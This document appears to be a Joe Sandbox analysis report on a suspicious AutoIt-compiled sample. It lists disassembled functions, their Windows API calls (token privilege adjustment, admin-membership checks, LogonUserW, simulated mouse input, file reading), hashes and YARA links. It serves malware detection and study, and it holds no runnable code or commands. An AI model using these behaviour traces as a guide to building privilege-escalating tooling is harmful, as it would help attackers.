                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DiskFreeSpace
                                                  • String ID:
                                                  • API String ID: 1682464887-0
                                                  • Opcode ID: d5ec991a2ac8cfe802cf4c062c4ba6268cd4cefa480fb2ab2d8abca6de5fb5cd
                                                  • Instruction ID: 41b126115d7b160bbf15e275e193956fd2b4056e6e0a4e9e4966f1e73a9fd89f
                                                  • Opcode Fuzzy Hash: d5ec991a2ac8cfe802cf4c062c4ba6268cd4cefa480fb2ab2d8abca6de5fb5cd
                                                  • Instruction Fuzzy Hash: 45215E35A00108EFCB00EFA5D880BEDBBB8FF49314F1480A9E905AB361DB31995ACB55
                                                  Function 00C487E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C10DB6: std::exception::exception.LIBCMT ref: 00C10DEC
                                                    • Part of subcall function 00C10DB6: __CxxThrowException@8.LIBCMT ref: 00C10E01
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C4882B
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C48858
                                                  • GetLastError.KERNEL32 ref: 00C48865
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1922334811-0
                                                  • Opcode ID: 6ab921e61148e760b37900955640c5a77ab70650a8601c3e1327a0a1593e3130
                                                  • Instruction ID: 3dcc0ca9c57b7d6ed6e169df01a9d71eb279eaaaac864db9f6220458665ee935
                                                  • Opcode Fuzzy Hash: 6ab921e61148e760b37900955640c5a77ab70650a8601c3e1327a0a1593e3130
                                                  • Instruction Fuzzy Hash: 25116DB2414204AFE718EFA4ECC5E6BB7A8FB45710B20852EE45597251EA70AC858B60
                                                  Function 00C4874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C48774
                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C4878B
                                                  • FreeSid.ADVAPI32(?), ref: 00C4879B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                  • String ID:
                                                  • API String ID: 3429775523-0
                                                  • Opcode ID: c2cad8758d0975e8bc6ac1b43754bebd314339fbe7a12c939beb0162f4ca681b
                                                  • Instruction ID: 81f406ce96556000dbee490d9c76aa8258f9631144d0c51056be6578f3034817
                                                  • Opcode Fuzzy Hash: c2cad8758d0975e8bc6ac1b43754bebd314339fbe7a12c939beb0162f4ca681b
                                                  • Instruction Fuzzy Hash: 07F03775A51208BBDB00DFE49C89AAEBBB8EF08201F1044A9A905E2281E7756A448B50
                                                  Function 00C5C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C5C6FB
                                                  • FindClose.KERNEL32(00000000), ref: 00C5C72B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 02ecd8181105ef9e4d0cf6e348e173cb5857f3aa035c285db77fbeef6901765b
                                                  • Instruction ID: 9d1f49c0a94def22169a4571e09e23dbc68a9f7b4bcc7d97e09ef39d2b01a724
                                                  • Opcode Fuzzy Hash: 02ecd8181105ef9e4d0cf6e348e173cb5857f3aa035c285db77fbeef6901765b
                                                  • Instruction Fuzzy Hash: CB11A1766006049FDB10DF29C885A2AF7E8FF85361F00855EF9A9C72A1DB30AC05CF81
                                                  Function 00C5A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C69468,?,00C7FB84,?), ref: 00C5A097
                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C69468,?,00C7FB84,?), ref: 00C5A0A9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage
                                                  • String ID:
                                                  • API String ID: 3479602957-0
                                                  • Opcode ID: a22391e54cb0708afaed2bfb67b7ae63b7fed1d879681de8ba2f09c57ffb9b06
                                                  • Instruction ID: 4deadbcb9eb1b5ff6c52b53dd070fee8006f3e721b8a33d16a06bec424e166a7
                                                  • Opcode Fuzzy Hash: a22391e54cb0708afaed2bfb67b7ae63b7fed1d879681de8ba2f09c57ffb9b06
                                                  • Instruction Fuzzy Hash: ECF0B43510422DAAD7109E95DC48FEA736CEF08361F004266B91996191C6309584CBA1
                                                  Function 00C481CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C48309), ref: 00C481E0
                                                  • CloseHandle.KERNEL32(?,?,00C48309), ref: 00C481F2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                  • String ID:
                                                  • API String ID: 81990902-0
                                                  • Opcode ID: 00b34f4d1a949afb60738dacfe29e7f05fd26f2ff75c9a39046cdeae2d314f41
                                                  • Instruction ID: 595dfb9130d3a778706d3cbc11cfb69507933daf56df7de3392065b365aea002
                                                  • Opcode Fuzzy Hash: 00b34f4d1a949afb60738dacfe29e7f05fd26f2ff75c9a39046cdeae2d314f41
                                                  • Instruction Fuzzy Hash: 93E0E671010510AFE7252B71EC45E7B77E9FF04310724882DF8A984470DB615CE1EB10
                                                  Function 00C1A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C18D57,?,?,?,00000001), ref: 00C1A15A
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C1A163
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 8ed13710281d8ef9a16d30d7c6fd89e16391bcb22514c21417cc909268a4926c
                                                  • Instruction ID: acda41386ed38b80cea4a87bc27319b48c01c999c490f953886b57efed39bfaa
                                                  • Opcode Fuzzy Hash: 8ed13710281d8ef9a16d30d7c6fd89e16391bcb22514c21417cc909268a4926c
                                                  • Instruction Fuzzy Hash: 18B09231054208ABCB006B91EC49B8C3F68EB44AAAF404024F60D84070CB6254928A91
                                                  Function 00C1F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 60c6c66b3999827348970e2d124da13718c8a7f2ac5e93c6f9b4d02fa3a8aefc
                                                  • Instruction ID: 7357b51dbfa747d17a673dfad7de829d0e9dff085f2bede6d4611880ce6e943d
                                                  • Opcode Fuzzy Hash: 60c6c66b3999827348970e2d124da13718c8a7f2ac5e93c6f9b4d02fa3a8aefc
                                                  • Instruction Fuzzy Hash: 6632F331D29F014ED7239634D872339A249AFB73D4F25D73BE829B59A6EB28C5C35204
                                                  Function 00C2242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8baee4469ddb0205916d0d7bc4a1be53fc6e55cde8c9d5545a7f715f65928e22
                                                  • Instruction ID: 87ba6b9b64c8a42b3385bbfb26fd1171c2e7c741ff2fd5e80e1313067cd06cca
                                                  • Opcode Fuzzy Hash: 8baee4469ddb0205916d0d7bc4a1be53fc6e55cde8c9d5545a7f715f65928e22
                                                  • Instruction Fuzzy Hash: F9B10131D2AF504DE7239639983133ABA5CAFBB2C5F51D71BFC2674D22EB2185834245
                                                  Function 00C58889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __time64.LIBCMT ref: 00C5889B
                                                    • Part of subcall function 00C1520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C58F6E,00000000,?,?,?,?,00C5911F,00000000,?), ref: 00C15213
                                                    • Part of subcall function 00C1520A: __aulldiv.LIBCMT ref: 00C15233
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Time$FileSystem__aulldiv__time64
                                                  • String ID:
                                                  • API String ID: 2893107130-0
                                                  • Opcode ID: aaf0188ac27fc0ab6d7933f9bf403e867828888f3e503d1232525216954a5f76
                                                  • Instruction ID: 81f8cff5603a51a9cd32b42032635f54f0d7853d189f029957af0c63d50469a8
                                                  • Opcode Fuzzy Hash: aaf0188ac27fc0ab6d7933f9bf403e867828888f3e503d1232525216954a5f76
                                                  • Instruction Fuzzy Hash: E721D2366256108BC729CF29D841B52B3E1EBA5311F288F2CD4F5CB2C0CA34B949CB54
                                                  Function 00C54C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00C54C76
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: mouse_event
                                                  • String ID:
                                                  • API String ID: 2434400541-0
                                                  • Opcode ID: 19e3e4cee6ae5e392ded98feb4348aeb7f85258f5717cf86143f64f2711ad35b
                                                  • Instruction ID: 2ae04f925fca094366c6a8f022b6d107b8889ccec92e408e39ba27075179da15
                                                  • Opcode Fuzzy Hash: 19e3e4cee6ae5e392ded98feb4348aeb7f85258f5717cf86143f64f2711ad35b
                                                  • Instruction Fuzzy Hash: C5D05EAC12260839EC2C47688D8BF7A1109F3C178BF84814A7A52850C0E8D079C8A03C
                                                  Function 00C487B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C48389), ref: 00C487D1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: LogonUser
                                                  • String ID:
                                                  • API String ID: 1244722697-0
                                                  • Opcode ID: 95e334d704e867de6f8810bad1058d5cd0bcff728853b0e87e89017b6750ddfe
                                                  • Instruction ID: 315440bd9ce499a37f70c78532f52a0a96b27e7b17a76e5074e73a63b9ec0b20
                                                  • Opcode Fuzzy Hash: 95e334d704e867de6f8810bad1058d5cd0bcff728853b0e87e89017b6750ddfe
                                                  • Instruction Fuzzy Hash: 20D05E3226450EABEF018EA4DC01EAE3B69EB04B01F408111FE15C61A1C775D835AB60
                                                  Function 00C1A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C1A12A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 44102feabb4a4a8e4157e89918d7976a32a943f56f579d9ac330a96796557744
                                                  • Instruction ID: bf9ac79932a3ff3131fde1e72c80180768f5deb017e2ebb99916f6e73e4defb9
                                                  • Opcode Fuzzy Hash: 44102feabb4a4a8e4157e89918d7976a32a943f56f579d9ac330a96796557744
                                                  • Instruction Fuzzy Hash: 0DA0113000020CAB8B002B82EC08A88BFACEB002A8B008020F80C800328B32A8A28A80
                                                  Function 00C08808 Relevance: .6, Instructions: 590COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 37ad362cd813f40bd0ca0c464e032adc067c15f65e39b4ca367ac4673057d910
                                                  • Instruction ID: 925efed65a60115c989abdc90b20734a0118a957e381fc0e9dee8d81c7fe83fe
                                                  • Opcode Fuzzy Hash: 37ad362cd813f40bd0ca0c464e032adc067c15f65e39b4ca367ac4673057d910
                                                  • Instruction Fuzzy Hash: A9221230A04516CBDF38CA69C49477CB7A1FB41344F28C06BD9E68B9D3DB709E99DA41
                                                  Function 00C121C5 Relevance: .3, Instructions: 345COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction ID: 0e04ff742fbe81e9352e0789d648f5b5ce6a569c831e100f094620b2aeb02042
                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction Fuzzy Hash: 96C199362050930ADF2E563A94750BEFAA15EA37B131E075DD8B3CB1D4EE24CAB5F610
                                                  Function 00C125FA Relevance: .3, Instructions: 341COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction ID: 38d65cb4edbd306fe813fcce5158eec481beac659501af71f4bf285921fcfa43
                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction Fuzzy Hash: 76C1B7372051930ADF2E563AD4350BEBAA15EA37B131E075DD8B2DB0D4EE14CAB4F620
                                                  Function 00C11978 Relevance: .3, Instructions: 323COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction ID: ab0873d0feaa3d69935327e94dd03d35b44bd2f04d2b5f79f4de2bcbec49c59b
                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction Fuzzy Hash: 12C1A73220909309DF2E563AD4351BEBAA15EA37B131E075DDDB3CB1C4EE18CAB5E650
                                                  Function 00C67806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00C6785B
                                                  • DeleteObject.GDI32(00000000), ref: 00C6786D
                                                  • DestroyWindow.USER32 ref: 00C6787B
                                                  • GetDesktopWindow.USER32 ref: 00C67895
                                                  • GetWindowRect.USER32(00000000), ref: 00C6789C
                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00C679DD
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00C679ED
                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67A35
                                                  • GetClientRect.USER32(00000000,?), ref: 00C67A41
                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C67A7B
                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67A9D
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67AB0
                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67ABB
                                                  • GlobalLock.KERNEL32(00000000), ref: 00C67AC4
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67AD3
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00C67ADC
                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C67AE3
